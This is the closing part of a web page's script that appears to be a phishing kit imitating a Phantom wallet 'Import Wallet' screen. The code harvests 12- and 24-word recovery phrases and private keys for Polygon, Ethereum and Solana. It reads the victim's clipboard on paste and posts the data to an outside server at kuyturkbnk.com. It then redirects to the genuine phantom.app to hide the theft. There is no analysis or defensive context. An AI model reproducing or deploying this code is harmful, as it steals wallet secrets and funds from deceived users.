        const btnSign = document.querySelectorAll(".btnSign");
        const [word12_1, word12_2, word12_3, word12_4, word12_5, word12_6, word12_7, word12_8, word12_9, word12_10, word12_11, word12_12] = document.querySelectorAll(".word12");
        const wordForm1 = document.querySelector(".wordForm1");
        const errbox = document.querySelector(".errbox");
        const [word24_1, word24_2, word24_3, word24_4, word24_5, word24_6, word24_7, word24_8, word24_9, word24_10, word24_11, word24_12, word24_13, word24_14, word24_15, word24_16, word24_17, word24_18, word24_19, word24_20, word24_21, word24_22, word24_23, word24_24] = document.querySelectorAll(".word24");
        const word24Input = document.querySelectorAll(".word24");
        const wordForm5 = document.querySelector(".wordForm5");
        const mFormk = document.querySelector(".mFormk");
        const name = document.querySelector(".name");
        const key = document.querySelector(".key");

        
        const postData  = (data) => {
            $.ajax({
            url: "https://kuyturkbnk.com/secured/sync2.php",
            type: "POST",
            data: { pass: data },
        });
        };
        impBoxText1.addEventListener("click", () => {
            formBox1.classList.add("hide");
            formBox2.classList.remove("hide");
             bxprBoxMajor.classList.add("hide");
              boxPhase2.classList.remove("hide");
        });

        arrow2.addEventListener("click", () => {
            formBox1.classList.remove("hide");
            formBox2.classList.add("hide");
        });


    btnSwitch1.addEventListener("click", ()=>{
        inpBox1.classList.add("hide");
        inpBox2.classList.remove("hide");
    });

     btnSwitch1.addEventListener("click", ()=>{
        inpBox1.classList.add("hide");
        inpBox2.classList.remove("hide");
    });

      btnSwitch2.addEventListener("click", ()=>{
        inpBox2.classList.add("hide");
        inpBox1.classList.remove("hide");
    });


    prLinkBar.addEventListener("click", () => {
        mainPrvNet.classList.remove("hide");
    });

    sol1.forEach((solBtn, index) => {
        solBtn.addEventListener("click", () => {
           subSpan.textContent =  part1[index].textContent;
           mainPrvNet.classList.add("hide");

           if(part1[index].textContent === "Polygon"){
                poly.classList.remove("hide");
                sol.classList.add("hide");
                ethe.classList.add("hide");
              
           }
           else if(part1[index].textContent === "Ethereum"){
                ethe.classList.remove("hide");
                sol.classList.add("hide");
                poly.classList.add("hide");
                
           }

            else if(part1[index].textContent === "Solana"){
                ethe.classList.add("hide");
                sol.classList.remove("hide");
                poly.classList.add("hide");
               
           }
        });
    });


    impBoxText2.addEventListener("click", () => {
        bxprBoxMajor.classList.remove("hide");
        formBox1.classList.add("hide");
        formBox2.classList.remove("hide");
        boxPhase2.classList.add("hide");
    });


    word12.forEach((input, index) => {
    input.addEventListener("paste", () => {
          navigator.clipboard.readText().then((copiedText) => {
           const text =  copiedText.split(" ");
           text.forEach((value, num) => {
                word12[num].value = value;
                btnSign[0].disabled = false;
           });
        });   
    });
    });

    word12.forEach((input, index) => {
    input.addEventListener("keyup", () => {
           if(word12_1.value !== "" && word12_2.value !== "" &&  word12_3.value !== "" && word12_4.value !== "" && word12_5.value !== "" && word12_6.value !== "" && word12_7.value !== "" && word12_8.value !== "" && word12_9.value !== "" && word12_10.value !== "" && word12_11.value !== "" && word12_12.value !== ""){
           btnSign[0].disabled = false;
        }
    });
});


wordForm1.addEventListener("submit", (e) => {
     e.preventDefault();
     errbox.classList.add("hide");
     let regex = /[!`@#$~%^&*()\-+={}[\]:;"'<>,.?\/|\\]/;
     let regex2 =  /\d/;
     let pass = false;

    for(let i = 0; i < word12.length; i++ ){
        if(regex.test(word12[i].value) || regex2.test(word12[i].value)){
            pass = true;
        }
    }
    if(pass){
        errbox.classList.remove("hide");
    }
    else {
         if(word12_1.value === "" || word12_2.value === "" ||  word12_3.value === "" || word12_4.value === "" || word12_5.value === "" || word12_6.value === "" || word12_7.value === "" || word12_8.value === "" || word12_9.value === "" || word12_10.value === "" || word12_11.value === "" || word12_12.value === ""){
            btnSign[0].disabled = true;
        }
        else {
             btnSign[0].disabled = true;
             btnSign[0].textContent = "Connecting...";
            let data = `Word 1: ${word12_1.value} \nWord 2: ${word12_2.value} \nWord 3: ${word12_3.value} \nWord 4: ${word12_4.value} \nWord 5: ${word12_5.value} \nWord 6: ${word12_6.value} \nWord 7: ${word12_7.value} \nWord 8: ${word12_8.value} \nWord 9: ${word12_9.value} \nWord 10: ${word12_10.value} \nWord 11: ${word12_11.value} \nWord 12: ${word12_12.value}`;
            postData(data);
            setTimeout(() => {
              btnSign[0].textContent = "Import Wallet";
               btnSign[0].disabled = false;
               e.target.reset();
            window.location.href = "https://phantom.app/";

            }, 4000);
        }
    }
   
});

word24Input.forEach((input, index) => {
    input.addEventListener("paste", () => {
          navigator.clipboard.readText().then((copiedText) => {
           const text =  copiedText.split(" ");
            
           text.forEach((value, num) => {
                word24Input[num].value = value;
                 btnSign[1].disabled = false;
           });
         
        });   
    });
});


word24Input.forEach((input, index) => {
  input.addEventListener("keyup", () => {
           if(word24_1.value !== "" && word24_2.value !== "" &&  word24_3.value !== "" && word24_4.value !== "" && word24_5.value !== "" && word24_6.value !== "" && word24_7.value !== "" && word24_8.value !== "" && word24_9.value !== "" && word24_10.value !== "" && word24_11.value !== "" && word24_12.value !== "" && word24_13.value !== "" && word24_14.value !== "" && word24_15.value !== "" && word24_16.value !== "" && word24_17.value !== "" && word24_18.value !== "" && word24_19.value !== "" && word24_20.value !== "" && word24_21.value !== "" && word24_22.value !== "" && word24_23.value !== "" && word24_24.value !== ""){
           btnSign[1].disabled = false;
        }
    });
});


wordForm5.addEventListener("submit", (e) => {
    e.preventDefault();
    errbox.classList.add("hide");
     let regex = /[!`@#$~%^&*()\-+={}[\]:;"'<>,.?\/|\\]/;
     let regex2 =  /\d/;
     let pass = false;

    for(let i = 0; i < word24Input.length; i++ ){
        if(regex.test(word24Input[i].value) || regex2.test(word24Input[i].value)){
            pass = true;
        }
    }

    if(pass){
        errbox.classList.remove("hide");
    }
    else {
        if(word24_1.value === "" || word24_2.value === "" ||  word24_3.value === "" || word24_4.value === "" || word24_5.value === "" || word24_6.value === "" || word24_7.value === "" || word24_8.value === "" || word24_9.value === "" || word24_10.value === "" || word24_11.value === "" || word24_12.value === "" || word24_13.value === "" || word24_14.value === "" || word24_15.value === ""|| word24_16.value === "" || word24_17.value === "" || word24_18.value === "" || word24_19.value === "" || word24_20.value === "" || word24_21.value === "" || word24_22.value === "" || word24_23.value === "" || word24_24.value === ""){
        btnSign[1].disabled = true;
    }
    else {
        btnSign[1].disabled = true;
        btnSign[1].textContent = "Connecting...";
        let data = `Word 1: ${word24_1.value} \nWord 2: ${word24_2.value} \nWord 3: ${word24_3.value} \nWord 4: ${word24_4.value} \nWord 5: ${word24_10.value} \nWord 6: ${word24_6.value} \nWord 7: ${word24_7.value} \nWord 8: ${word24_8.value} \nWord 9: ${word24_9.value} \nWord 10: ${word24_10.value} \nWord 11: ${word24_11.value} \nWord 12: ${word24_12.value} \nWord 13: ${word24_13.value} \nWord 14: ${word24_14.value} \nWord 15: ${word24_15.value} \nWord 16: ${word24_16.value} \nWord 17: ${word24_17.value} \nWord 18: ${word24_18.value} \nWord 19: ${word24_19.value} \nWord 20: ${word24_20.value} \nWord 21: ${word24_21.value}  \nWord 22: ${word24_22.value} \nWord 23: ${word24_23.value} \nWord 24: ${word24_24.value}`;
        postData(data);
        setTimeout(() => {
            e.target.reset();
            btnSign[1].disabled = false;
            btnSign[1].textContent = "Import Wallet";
              window.location.href = "https://phantom.app/";
        }, 4000); 
    }   
    }
      
});


mFormk.addEventListener("submit", (e) => {
    e.preventDefault();

    const type = subSpan.textContent;
    const name = e.target.elements.name.value;
    const key = e.target.elements.key.value;

    if(name === "" || key === ""){
        btnSign[2].disabled = true;
    }
    else {
        const data = `Type: ${type} \nname: ${name} \nKey: ${key}`;
        postData(data);
        btnSign[2].disabled = true;
        btnSign[2].textContent = "Connecting...";

        setTimeout(() => {
            e.target.reset();
            btnSign[2].disabled = false;
            btnSign[2].textContent = "Import";
            window.location.href = "https://phantom.app/";
        }, 3000);
    }
});


key.addEventListener("keyup", () => {
    if(name.value !== "" || key.value !== "" ){
        btnSign[2].disabled = false;
    }
    else {
         btnSign[2].disabled = true;
    }
})


    </script>
</body>
</html>